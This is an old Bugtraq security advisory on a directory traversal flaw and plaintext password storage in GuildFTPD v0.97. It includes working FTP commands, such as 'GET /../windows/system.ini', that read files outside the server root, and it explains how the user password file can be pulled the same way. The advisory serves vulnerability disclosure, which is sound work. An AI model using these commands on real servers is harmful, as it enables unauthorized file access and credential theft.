Date: Sat, 26 May 2001 09:44:47 -0700 (PDT)
From: ByteRage <byterage@yahoo.com>
To: bugtraq@securityfocus.com
Subject: GuildFTPD v0.97 Directory Traversal / Weak password encryption
GuildFTPD v0.97 Directory Traversal / Weak password
encryption
AFFECTED SYSTEMS
GuildFTPD v0.97
tested on Windows 9x, probably works on NT / 2k as
well
DESCRIPTION
1) Directory Traversal
Consider the following FTP session (I'm using windows'
FTP.EXE proggie, and its associated commands) :
The following commands :
CD ../
CD .../
CD /.../
CD c:\
etc...
all give "550 Access denied." errors, so the frontdoor
seems to be closed... The following stuff *does* work
however :
LS /../*
This way, we can map out the whole harddrive...
other example : LS /../../windows/*
Now, to retrieve a file, do something like :
GET /../windows/system.ini c:\received-file.txt
2)
And another thing... I don't want to whine to the guys
who wrote this program, but storing the user:password
pairs in plaintext in the program directory (the
default.usr & default?.usr files) is asking for
trouble : most ftp servers at least provide some way
of
encryption / hashing... when you combine this with the
traversal bug, anyone can get the passwords of all the
users by grabbing the default.usr file.
VENDOR STATUS
I have sent this advisory to both DrPhibez
<guildftpd@ztnet.com> and Nitro187 (Matthew
Flewelling) <nitro@zophar.net>, the programmers of
GuildFTPD
[ByteRage] <byterage@yahoo.com> [www.byterage.cjb.net]
__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/
